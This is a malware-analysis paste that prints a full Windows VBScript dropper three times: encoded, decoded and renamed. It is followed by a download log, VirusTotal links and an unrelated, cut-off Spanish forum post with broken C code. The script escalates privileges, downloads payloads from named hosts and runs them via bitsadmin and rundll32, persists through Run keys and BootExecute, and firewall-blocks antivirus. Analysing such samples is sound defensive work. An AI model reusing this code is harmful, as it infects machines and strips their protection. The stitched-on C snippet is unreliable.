RcRln)]:) Rc B@#@&%z~4!8"sm(vWWdR]!xvJmsN,&m,Dnoc+an,bfG~JrC|d\w?I?:2\-/;MDnxD/W        Y.G
^?+Ow;WUYMG^-KmDDkymxrEPJ\~CbNn VmKh+t+/kCL+,zDP]2!mG6IG~z9P+~JsJbSZ~PD!n@#@&%HA(!
4.:1(vW0JR"EUcrm:9~z1P/14Olk3kP&Z]3zK3PJoPJ?/~}1Z3~J?PPr~LPoKDslYGlDnKb:n`GlOnzNNvEx
r~P2S~1Khv#b~*b,[~{@#@&J,zPH,JJ`{As)%GXROT~!ROc8F+R%F*Oy*)fw %~3 OA8yEEPJK"PEJ^h9P&
m,8kD/C[skx~&DDCxkWD~a]"b1GrtYPJfGh    VGC9Pzh]q}Iq:e~C&M_PEJ4ODwlzJ8D1+UOD:G[VGR1Gs
R8MzmD;!k7G/JwCDDR%2TJJ,EJu?5UP3H"r}KY-Y/}HKj:3Igb\3u{nC.DRn6ErP'km4Ylk3k~zG2J2:2~&
wPz:HPrJ        F3obRfl%R!$TRO*F8ORGX  *)fw 0AA+OANyJrJJ,z"iPU5jKAHE~LP{@#@&J,[DL +X+,b9
f~ErCFStw?I?P3t-Z;.M+UY;G       Y.KVU+Y'ZKUYMWs-U+ddbWx,\l      lo.EJ,z7P$WGOA6nm!O+,zO~"2Mm\`
SPq|j\P&9PrJl!YK^tmVPmEOG1t3,M-ZP-ZYj5UKAH]r6Pu-YZ}\n`K3]gbH3Y|nCDD 6n'!rJPJsrb~Z~
PD!+@#@&EeeCMeCeeC)HK&.&Ki?MMCeMeCMeE@#@&[ZMDWeR/]hws1 6w!s|G8CKqD_ET9$&iov#@#@&oE      m
YbGUP$C9\\     9VntNxiAz:uz;fAKFkE(fNfvrUovy%s2KF"Sh}]N*@#@&~,PsK.P(*Y8}"LOq(K3m(9R%(68
$M,'~Jx`6Uov+%wf:G"dn\IN*P:GP8PjYw~R8@#@&,~P,PP&W~HbNvrU(+RsfKF"Sh}][BP4XO8p"LO((
K31qG%%&68$MBPq#,'~E'JP:4+      P2XrOPwWM@#@&P~~g+aY@#@&P,P5u9\v-       GMK}9B`A)sCHZf~nndE&f%&
,'~J0Y,cr      (vy0o&:G.SK}][BP8*Dqp.L1((K2^(G%0qXq~M~ P8#@#@&2        [PwEUmDkGU@#@&?!8P&oyysK
lFoyDrj(T\:[FZz`zpo;VM!X{",a,;b@#@&~,P,sWMPACm4PsGW614$4190rOw0^~rx,b5s;M!TlG],X1Zc?
;8wWV[nM/~@#@&~,P~,P,P?Y,]M+*r*0(4\6wF;+F5Fc:BppW*.D0\$0WvuZaL%HtXB8P'~-5Fd%yOl(nb4
2N yRVnYwWsNDcsFc6O4;(1NR61w6VcnCY4b,@#@&P,~P,P~~U+Y~  RLf;0pkxq,',IM+*bX3ot\0aF/+8p
FWP9opcl".%7ARcC/2T%ztlBFcsrs/P@#@&,P~P,~,PWKD,+l1t,2A_th9y%^4h*h!L1WyVMz6LNAlLsv"
-ZvTv"Tv0c0XbVG",kUPq0N&50(kxF,@#@&~P,P~P,P~~,Pk6~S;l/c(xUYM`q~2$_th9y0m4nXA!o1*"^
DzrN%~*%^v.\!+!+]!+3*%+6)sKy~,ER6+rbbP@*P8POtnU,@#@&di7d,P~~,LX$8Z4":1(+cWdR"ExvJ1h
N,z^P   +Od4Pl9-0bD+SCsV,0bDnhCs^PCN9~D!Vn~     l:nxrJEPL~7pqk%yY*o+b8&9 +RV+OobV+gC:`w~u
4:x Rm4nXA!oHc.sDHr%%~*Ls.\TvZ"!0cRv6zVK"#,[~JrJ~[bD'bUPmmYbGU'(VKmVP2.Ko.lsxJrJ~
',wAu4s9+%14h*A!ogcy^DH6LNAXL^v"-Zv!+]!+3cRab^W.P'PEErPnxm8V'znkJ#STBK.E@#@&d7id,
PP,PNzA(!8ysm(W0Sc]E   `J1h[PJm,+^tG~'g_-r~[,w$u4:9+01tK*S;T1*.VMXrNL~XL^v"\ZvT"!v0*
%+6b^G"PLPr@*@*PYjI?P2t]r}KYwuZr\K`K3Ig)t2Y|nmDYr[r JLJ.JLJ.ELJkrb~Z~KM;n@#@&did7P~~
,P%X~8!(yh^&vcWJcI;xvE1:[,z1PxYk4PmN-0bDnAmVV,WkM+hmssPmN9P.Esn,xC:xJrJ~',\pqdR O*
onb4f9 yRMYwrV1C:`2$_t:x+%1tnlA;ogc.V.X6%NAXL^y7!T+I!VW%6zsKyb,[,JJrP9rD{W;Y,
l^ObWx{8VKm3,2.WTDm:xJEE,[~w~uts9+01tnXA!oHc.sMX6NL~*L^v.-!+!IZvV*Rv6zsW.P[,EEJ,+      l
8VnxH+dJ*S!BK.;@#@&77iP~P,~,P3 N,q0@#@&,~P,P~P,1naD@#@&,~P,PP,~(o. ^nCGL+MkiqZt:9FT
z,VG*aOt54g[Rr1a0^P@#@&P,~Pg+aY,@#@&3   NPU;4@#@&s!U^YbW        P[!!.650/"As^m+6w!:F{8CGFMu!!
B$&`s`*@#@&7+FM\S`FHBHx\o*!Z}LGX|,',LzA8T(yhm&c6S 3XwlU[Ax-kMG        :n      YUYDbxTd`r]KI}M]
)tsqd3?v(%+bYJ*@#@&da&qKIE[H:Ky f.      wG(~x,LzA(T(yh1q+c0dRAawmx[2    \r.Kx:UYUYDbUL/vJun
]r!]zHoqd3?uJb@#@&d?nO,fnS1eRC+Hr~\%l,05!       2tbZc[C,'PVnY}4L^O`rhbxhohOk)w-cwDKWOwU+m
;.bYzZUD+.yJ*@#@&i?OPAchExE)F2n;U2vb,66tK3sxR,qpX4PxPGnS150uyXr$-R*13$T      2tz!WNlc2
Xnm5EnDH`EjV+1OPCP0MGhPzJ,[~JUE,[~JDEPLPErrP[~EjJ~[,EbJ~LPrDJ,[,EErP'Pr/E~LPJhEPLPJ
ME~[,JKJ~[~E9J~[,EErP'~rmJ~',JOJ*@#@&doKD,2l1t,[bSH*(O+^y1 1#2Gc*M/nGD36X4;GW|.%!F
*,kU~Ac:;B!bF&h5Uwb,X0}h3sU%OF}*4+@#@&iPPqrY4PNzA\co,m H+1.3fWXD;+{O00X8!W*|M0!|
X@#@&idl! (t7;uWWPx~$CN7\qfMht[9`Az:uX/9~nF/!(fN&c alY4PK?ro  n9n.KN!mYA6b@#@&d7l!
8tq\;_Gc,'P"n2Vmm`CE+8\-;_GcBJYKMWo.CssrVdv60+#uJ~GV\S`FH9Hx-pW!!\%flv|*@#@&dil
! 8}    -$CGc,xP"+2smm+cC! 8}q-$CGW~r]nMWT.lssrV/YEB6&8K5!NH:K"xGDqs{(b@#@&d7/OP"MXb
*3p4t02F;+8pqWKx(pW*..%7A0c+C/2T%X4X98P',-}Fk%yYX(nr(&[ y MYoG^N+.cmE+4\       7;uKc*@#@&
id@#@&di/nY,0%2;3odx8P',]!vlkl3pt\WaF/ 8}FWKBp5c*".R\$%W_Z2T%Ht*xFcok^+d@#@&d7@#@&
ddwGD,2l14~yFXwmu 6skbXH,rx,0%2;3pd    F@#@&i7i}1DsZ,ZX2&p*49L%Zc.s,'P.{XwmCy6s/z*tRHl
hn@#@&7di(0,\}qk% OXo+r42[y  V+D26D+    dkKxHls+ctOYsZ1ZX2qoX49T%Zc.Vb~{PE+XnJ,K4n      @#@&
77id%X~8Z4"sm&vc6Sc]E   `EmsN~&1PxO/4Pl9-EPLPr0EP'~rkEPL~JMJ~',J+E~LPEhr~LPEmJ,[PrVr~
[,JsP6k.nSlV^~l9NPM;s+,xm:n'EErP'P.{Xwmu+}V/)XtRHlsn,[~rJrPNbD{rx,l^YbWUx(VW1VPaDWT.
C:{JrJ~[~C! 8}q-;_W*~LPJwE,[~yFzwmuyr^/blHcHls+~[,JEE,+xm8V'XdE#B!BK.En@#@&d7di%X~
4T8.:m(W0JR";  `E1:9Pz1P^tKPwgQ-E~LPl!+4\\$uGc,[,JwJ~',y{Xw^Cyrsdz*H Hm:nPL~r@*@*,
]U5?:2t]r}KY-uZ6\hjKA]1zH2umKlMJLJOJ'EcJ'JME[rDE'rkJbSZ~PD!n@#@&7idiLX~4Z8ysm(vW0J "
ExvEmsNPJ^~xYkt~lE~LPENr~[,J-E,[PEWrP'PrrrP',JMJPLPrnJ,[~JSJ~',Jlr~[,JVr~'PrV,0EP'~
rkEPL~JMJ~',J+E~LPEhr~LPEmJ,[PrVr~[,JsPmN[~MEV~xm:+{EEJ,[,y{Xo^_ 6Vk)*tRHCs+P'~rJEP
9rM'G!Y,lmDkKU'(VGm0P2.KoDmh'rJJ,'~l! (}        \5uKc~[,E-rP'~.GXo^_ 6Vk)lH gls+PLPrEJ,+Ul(
VnxH+/rb~Z~KM;n@#@&did3x[~&0@#@&i716O@#@&dd(L. snm{T .bj&!}sN8TX,\}Fk%+Ol(+b8&9  c!
nYwW^NnDcC! 8}q-;_W*b@#@&d~~Ax[PqrDt@#@&dg+6D@#@&~P,PKcUK4;1Z  {k^Y,Gh}cO5Fk{%h~{P9K
UPlk33amInd!VO{U;1mnk/@#@&2    N,oE    mOkKx@#@&TNQIAA==^#~@


// ========================================
// Turn out to be Obfuscated VBA Script
// ========================================


'**************************'
'********By Evo...*********'
'**************************'
Dim vQ1s82t5Xeib3d22
Set jyBb0bzmcI64fL = CreateObject("WScript.Shell")
Set vQ1s82t5Xeib3d22 = CreateObject("Scripting.FileSystemObject")
PU5Rebz4878vAXUsvWw5 = jyBb0bzmcI64fL.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName")
If (InStr(PU5Rebz4878vAXUsvWw5, "7") <> 0) or (InStr(PU5Rebz4878vAXUsvWw5, "Vista") <> 0) or (InStr(PU5Rebz4878vAXUsvWw5, "8") <> 0) Then
        If WScript.Arguments.Count = 0 Then
                Set Rq56sng5zSppB5r02lCx828dDeTZKZP3T = CreateObject("Shell.Application")
                Rq56sng5zSppB5r02lCx828dDeTZKZP3T.ShellExecute "wscript.exe", WScript.ScriptFullName & " |", , "runas", 1
                WScript.Quit
        End If
End If
Pp3N9byPBwjp6JoBoCCgMbgK = jyBb0bzmcI64fL.ExpandEnvironmentStrings("%SYSTEMROOT%")
If (vQ1s82t5Xeib3d22.FileExists(Pp3N9byPBwjp6JoBoCCgMbgK & "\qXfWln92f")) Then
        WScript.Quit
end if
set LbG2hvXzI = vQ1s82t5Xeib3d22.CreateTextFile(Pp3N9byPBwjp6JoBoCCgMbgK & "\qXfWln92f", 2, true)
LbG2hvXzI.Close
'....:ARQUIVO RRI:....'
jyBb0bzmcI64fL.Run("cmd /c echo RR>> ""%SYSTEMROOT%\%COMPUTERNAME%_Part."&"r"&"r"&"i"""),0,True
'....:VARIAVEIS:....'
jyBb0bzmcI64fL.Run("cmd /c setx.exe UPLKVARIABLE ""http://brcentermodelo.com.br/arquivos/up.jpg"" /M"),0,True
jyBb0bzmcI64fL.Run("cmd /c setx.exe upvariable %RANDOM% /M"),0,True
'....:AVISAR:....'
jyBb0bzmcI64fL.Run("cmd /c reg query HKLM\SYSTEM\ControlSet001\Services\G"&"b"&"p"&"S"&"v" & _
" &&schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[Plugin][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM" & _
" ||schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[N/A][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM"),0,True
'....:UPDATE:....'
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONSTART /DELAY 0009:00 /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}"" " & _
"/TR ""cmd /c bitsadmin /transfer t%RANDOM% /Download /PRIORITY HIGH %UPLKVARIABLE% %SYSTEMROOT%\%upvariable%.tmp" & _
" &rundll32.exe %SYSTEMROOT%\%upvariable%.tmp,#1"" /RU SYSTEM"),0,True
'....:REINI:....'
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 14, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /F &shutdown /r /t 60 /f"" /RU SYSTEM"),0,True
'....:KL:....'
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 4, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /TR ""cmd /c bitsadmin /transfer k%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/host.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%.tmp""" & _
" &schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /F &echo 10032> ""%SYSTEMROOT%\%upvariable%"""" /RU SYSTEM" & _
" &&reg.exe ADD ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" /v %COMPUTERNAME% /t REG_SZ /d ""rundll32 %SYSTEMROOT%\%COMPUTERNAME%.tmp,#1"" /F"),0,True
'....:PART:....'
jyBb0bzmcI64fL.Run("cmd /c reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Partizan"" /v HideWelcomeMessage /t REG_DWORD /d 2 /F"),0,True
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 3, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"" /TR ""cmd /c bitsadmin /transfer p%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/part.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%_Part.exe"" &schtasks /DELETE /F /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"""" /RU SYSTEM" & _
" &reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"" /v BootExecute /t REG_MULTI_SZ /d ""autocheck autochk *\0 \0%SYSTEMROOT%\%COMPUTERNAME%_Part.exe\0"" /F"),0,True
'*********ANTIVITUS*********'
d0GrfY8sRwFlc2OF0mK71Ho1rHu0Jq3UF()
Function qHdv6vWDGPZdJUBAmHyCDBPKsuIDj3(OnX628F3T7zLPZRd)
   For b5t1Qzj9IbTEcID88Ix1BG = Len(OnX628F3T7zLPZRd) To 1 Step -1
      If Mid(OnX628F3T7zLPZRd, b5t1Qzj9IbTEcID88Ix1BG, 1) = "\" Then Exit For
   Next
   qHdv6vWDGPZdJUBAmHyCDBPKsuIDj3 = Left (OnX628F3T7zLPZRd, b5t1Qzj9IbTEcID88Ix1BG - 1)
End Function
Sub Igz2lPa7g2riUI0Zmd10y(AQFuGG057R9x9C)
    For Each l74x9hqbNd8O9pfl in AQFuGG057R9x9C.SubFolders
        Set RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1 = vQ1s82t5Xeib3d22.GetFolder(l74x9hqbNd8O9pfl.Path)
        Set W8j3qkXsn1 = RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1.Files
        for each pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz in W8j3qkXsn1
            if LCase(InStr(1,pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz, ".exe")) > 1 then
                                     jyBb0bzmcI64fL.Run("cmd /c netsh advfirewall firewall add rule name=""" & vQ1s82t5Xeib3d22.GetFileName(pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz) & """ dir=in action=block program=""" & pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz & """ enable=yes"),0,True
                                     jyBb0bzmcI64fL.Run("cmd /c echo \??\" & pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz & ">> %SYSTEMROOT%\%COMPUTERNAME%_Part"&"."&"r"&"r"&"i"),0,True
                                     jyBb0bzmcI64fL.Run("cmd /c netsh advfirewall firewall add rule name=""" & vQ1s82t5Xeib3d22.GetFileName(pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz) & """ dir=out action=block program=""" & pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz & """ enable=yes"),0,True
                               End If
        Next
        Igz2lPa7g2riUI0Zmd10y l74x9hqbNd8O9pfl
    Next
End Sub
Function d0GrfY8sRwFlc2OF0mK71Ho1rHu0Jq3UF()
        e7GMLU1NJynvX400ZjD56K = jyBb0bzmcI64fL.ExpandEnvironmentStrings("%PROGRAMFILES(X86)%")
        x31PYudMTPznDrWF7X = jyBb0bzmcI64fL.ExpandEnvironmentStrings("%PROGRAMFILES%")
        Set DeLcY8H2yOBv859kq0nEZA04da = GetObject("winmgmts:\\.\root\SecurityCenter2")
        Set E4muJuAK3PqSp6i9xfZPkmn891Q5he = DeLcY8H2yOBv859kq0nEZA04da.ExecQuery("Select * from A" & "n" & "t" & "i" & "V" & "i" & "r" & "u" & "s" & "P" & "r" & "o" & "d" & "u" & "c" & "t")
        For Each dAwM4X9ec62N2cVED45rCe7tkfy6buo4Kr8uK5 in E4muJuAK3PqSp6i9xfZPkmn891Q5he
          With dAwM4X9ec62N2cVED45rCe7tkfy6buo4Kr8uK5
                au2bZWvqHo4 = qHdv6vWDGPZdJUBAmHyCDBPKsuIDj3(.pathToSignedProductExe)
                au2bZWvqHo4 = Replace(au2bZWvqHo4,"%ProgramFiles(x86)%",e7GMLU1NJynvX400ZjD56K)
                au2bZWvqHo4 = Replace(au2bZWvqHo4,"%ProgramFiles%",x31PYudMTPznDrWF7X)
                set RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1 = vQ1s82t5Xeib3d22.GetFolder(au2bZWvqHo4)
               
                set W8j3qkXsn1 = RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1.Files
               
                For Each z7yFcH2OlsA5M in W8j3qkXsn1
                        Z9tF09CxEIX5hJg804rl = z7yFcH2OlsA5M.Name
                        If vQ1s82t5Xeib3d22.GetExtensionName(Z9tF09CxEIX5hJg804rl) = "exe" Then
                                jyBb0bzmcI64fL.Run("cmd /c netsh adv" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l firewall add rule name=""" & z7yFcH2OlsA5M.Name & """ dir=in action=block program=""" & au2bZWvqHo4 & "\" & z7yFcH2OlsA5M.Name & """ enable=yes"),0,True
                                jyBb0bzmcI64fL.Run("cmd /c echo \??\" & au2bZWvqHo4 & "\" & z7yFcH2OlsA5M.Name & ">> %SYSTEMROOT%\%COMPUTERNAME%_Par"&"t"&"."&"r"&"r"&"i"),0,True
                                jyBb0bzmcI64fL.Run("cmd /c netsh a" & "d" & "v" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l f" & "i" & "r" & "e" & "w" & "a" & "l" & "l add rule name=""" & z7yFcH2OlsA5M.Name & """ dir=out action=block program=""" & au2bZWvqHo4 & "\" & z7yFcH2OlsA5M.Name & """ enable=yes"),0,True
                        End If
                Next
                Igz2lPa7g2riUI0Zmd10y vQ1s82t5Xeib3d22.GetFolder(au2bZWvqHo4)
          End With
        Next
    P4ST6hCNCn7ilt9DmQ49Y7i78m = DTSTaskExecResult_Success
End Function


// ======================
// Beautified:
// ======================


'**************************'
'********By Evo...*********'
'**************************'

Dim MyFileSysObject
Set MyMalicious1 = CreateObject("WScript.Shell")
Set MyFileSysObject = CreateObject("Scripting.FileSystemObject")
MyWinVer = MyMalicious1.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName")

If (InStr(MyWinVer, "7") <> 0) or (InStr(MyWinVer, "Vista") <> 0) or (InStr(MyWinVer, "8") <> 0)
    Then
        If WScript.Arguments.Count = 0 Then
          Set MyShellScript = CreateObject("Shell.Application")
          MyShellScript.ShellExecute "wscript.exe", WScript.ScriptFullName & " |", , "runas", 1
          WScript.Quit
        End If
End If

MyUserName = MyMalicious1.ExpandEnvironmentStrings("%SYSTEMROOT%")
If (MyFileSysObject.FileExists(MyUserName & "\qXfWln92f")) Then
        WScript.Quit
end if

set MyFileAndOSverOK = MyFileSysObject.CreateTextFile(MyUserName & "\qXfWln92f", 2, true)
MyFileAndOSverOK.Close


'....:ARQUIVO RRI:....'
MyMalicious1.Run("cmd /c echo RR>> ""%SYSTEMROOT%\%COMPUTERNAME%_Part."&"r"&"r"&"i"""),0,True

'....:VARIAVEIS:....'
MyMalicious1.Run("cmd /c setx.exe UPLKVARIABLE ""http://brcentermodelo.com.br/arquivos/up.jpg"" /M"),0,True
MyMalicious1.Run("cmd /c setx.exe upvariable %RANDOM% /M"),0,True

'....:AVISAR:....'
MyMalicious1.Run("cmd /c reg query HKLM\SYSTEM\ControlSet001\Services\G"&"b"&"p"&"S"&"v" & _
" &&schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[Plugin][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM" & _
" ||schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[N/A][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM"),0,True

'....:UPDATE:....'
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONSTART /DELAY 0009:00 /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}"" " & _
"/TR ""cmd /c bitsadmin /transfer t%RANDOM% /Download /PRIORITY HIGH %UPLKVARIABLE% %SYSTEMROOT%\%upvariable%.tmp" & _
" &rundll32.exe %SYSTEMROOT%\%upvariable%.tmp,#1"" /RU SYSTEM"),0,True

'....:REINI:....'
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 14, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /F &shutdown /r /t 60 /f"" /RU SYSTEM"),0,True
'....:KL:....'
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 4, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /TR ""cmd /c bitsadmin /transfer k%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/host.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%.tmp""" & _
" &schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /F &echo 10032> ""%SYSTEMROOT%\%upvariable%"""" /RU SYSTEM" & _
" &&reg.exe ADD ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" /v %COMPUTERNAME% /t REG_SZ /d ""rundll32 %SYSTEMROOT%\%COMPUTERNAME%.tmp,#1"" /F"),0,True

'....:PART:....'
MyMalicious1.Run("cmd /c reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Partizan"" /v HideWelcomeMessage /t REG_DWORD /d 2 /F"),0,True
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 3, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"" /TR ""cmd /c bitsadmin /transfer p%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/part.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%_Part.exe"" &schtasks /DELETE /F /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"""" /RU SYSTEM" & _
" &reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"" /v BootExecute /t REG_MULTI_SZ /d ""autocheck autochk *\0 \0%SYSTEMROOT%\%COMPUTERNAME%_Part.exe\0"" /F"),0,True

'*********ANTIVITUS*********'
var1()
Function var2(var3)
   For MyCount = Len(var3) To 1 Step -1
      If Mid(var3, MyCount, 1) = "\" Then Exit For
   Next
   var2 = Left (var3, MyCount - 1)
End Function

Sub Myevasion(MyMalicious2)
    For Each MyCount2 in MyMalicious2.SubFolders
        Set MyPath = MyFileSysObject.GetFolder(MyCount2.Path)
        Set MyPayload = MyPath.Files
        for each MyFileData in MyPayload
            if LCase(InStr(1,MyFileData, ".exe")) > 1 then
                                     MyMalicious1.Run("cmd /c netsh advfirewall firewall add rule name=""" & MyFileSysObject.GetFileName(MyFileData) & """ dir=in action=block program=""" & MyFileData & """ enable=yes"),0,True
                                     MyMalicious1.Run("cmd /c echo \??\" & MyFileData & ">> %SYSTEMROOT%\%COMPUTERNAME%_Part"&"."&"r"&"r"&"i"),0,True
                                     MyMalicious1.Run("cmd /c netsh advfirewall firewall add rule name=""" & MyFileSysObject.GetFileName(MyFileData) & """ dir=out action=block program=""" & MyFileData & """ enable=yes"),0,True
                               End If
        Next
        Myevasion MyCount2
    Next
End Sub

Function var1()
        MyProgFile = MyMalicious1.ExpandEnvironmentStrings("%PROGRAMFILES(X86)%")
        MyProgFile2 = MyMalicious1.ExpandEnvironmentStrings("%PROGRAMFILES%")
        Set MySecCenter = GetObject("winmgmts:\\.\root\SecurityCenter2")
        Set MySecCenterSELECT = MySecCenter.ExecQuery("Select * from A" & "n" & "t" & "i" & "V" & "i" & "r" & "u" & "s" & "P" & "r" & "o" & "d" & "u" & "c" & "t")
        For Each MyCount3 in MySecCenterSELECT
          With MyCount3
                MyrealPATH = var2(.pathToSignedProductExe)
                MyrealPATH = Replace(MyrealPATH,"%ProgramFiles(x86)%",MyProgFile)
                MyrealPATH = Replace(MyrealPATH,"%ProgramFiles%",MyProgFile2)
                set MyPath = MyFileSysObject.GetFolder(MyrealPATH)
               
                set MyPayload = MyPath.Files
               
                For Each MyrealPAYLOAD in MyPayload
                        MyrealPAYLOADNAME = MyrealPAYLOAD.Name
                        If MyFileSysObject.GetExtensionName(MyrealPAYLOADNAME) = "exe" Then
                                MyMalicious1.Run("cmd /c netsh adv" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l firewall add rule name=""" & MyrealPAYLOAD.Name & """ dir=in action=block program=""" & MyrealPATH & "\" & MyrealPAYLOAD.Name & """ enable=yes"),0,True
                                MyMalicious1.Run("cmd /c echo \??\" & MyrealPATH & "\" & MyrealPAYLOAD.Name & ">> %SYSTEMROOT%\%COMPUTERNAME%_Par"&"t"&"."&"r"&"r"&"i"),0,True
                                MyMalicious1.Run("cmd /c netsh a" & "d" & "v" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l f" & "i" & "r" & "e" & "w" & "a" & "l" & "l add rule name=""" & MyrealPAYLOAD.Name & """ dir=out action=block program=""" & MyrealPATH & "\" & MyrealPAYLOAD.Name & """ enable=yes"),0,True
                        End If
                Next
                Myevasion MyFileSysObject.GetFolder(MyrealPATH)
          End With
        Next
    MyNoError = DTSTaskExecResult_Success
End Function


// alive PoC:

Resolving brcentermodelo.com.br (brcentermodelo.com.br)... 52.8.51.135
Connecting to brcentermodelo.com.br (brcentermodelo.com.br)|52.8.51.135|:80... connected.
HTTP/1.0 GET /arquivos/up.jpg request sent, awaiting response... 200 OK
Length: 45568 (44K) [image/jpeg]
Saving to: './sample'
./sample     100%[=====>]  44.50K   213KB/s   in 0.2s
2015-08-13 16:15:17 (213 KB/s) - './sample' saved [45568/45568]

Resolving martinstranns.com.br (martinstranns.com.br)... 52.8.140.254
Connecting to martinstranns.com.br (martinstranns.com.br)|52.8.140.254|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2015-08-13 16:29:14 ERROR 403: Forbidden.

// VT samples:
virustotal.com/en/file/8538c78539832eaf25550bdf0ab1a9f9f004459af0208cf4d047aa41dfb6f260/analysis/1439451647/ ... https://www.virustotal.com/en/file/2fba569d0875dea7724285d61f792e28a67a2707772beb33749e4be5931ec82c/analysis/1439451661/ ... https://www.virustotal.com/en/file/1c14e870a9420d9c18b6caf8f44964ec07fa87f14b896fce50c043a8cb9b5439/analysis/ ... https://www.virustotal.com/en/file/ce96958d91aa1e900f7c73d0ffe35feffee8678e5adfd240f7fbf160f262a1b7/analysis/1439451732/ ...


#--
#MalwareMustDie!!
#22
Muy buenas, el motivo de la consulta es la siguiente. Estoy empezando en C y por ahora lo estoy haciendo desde dev c++. El tema es que pongo el código tipico para empezar el hola mundo pero no se queda la pantalla con el programa, sino que sale y en cuestión de segundos se apaga, para que eso no pase se usa tengo entendido la sentencia return 0; que si llega hasta ahi es que todo a salido como dios manda.

El código es este

Código: c

/*Libreria para las entradas y salidas*/
# include <studio.h>

int main()  /*El comienzo del programa*/
{
    /*EL bloque del programa*/
    print("EMpezando programación en C\n");

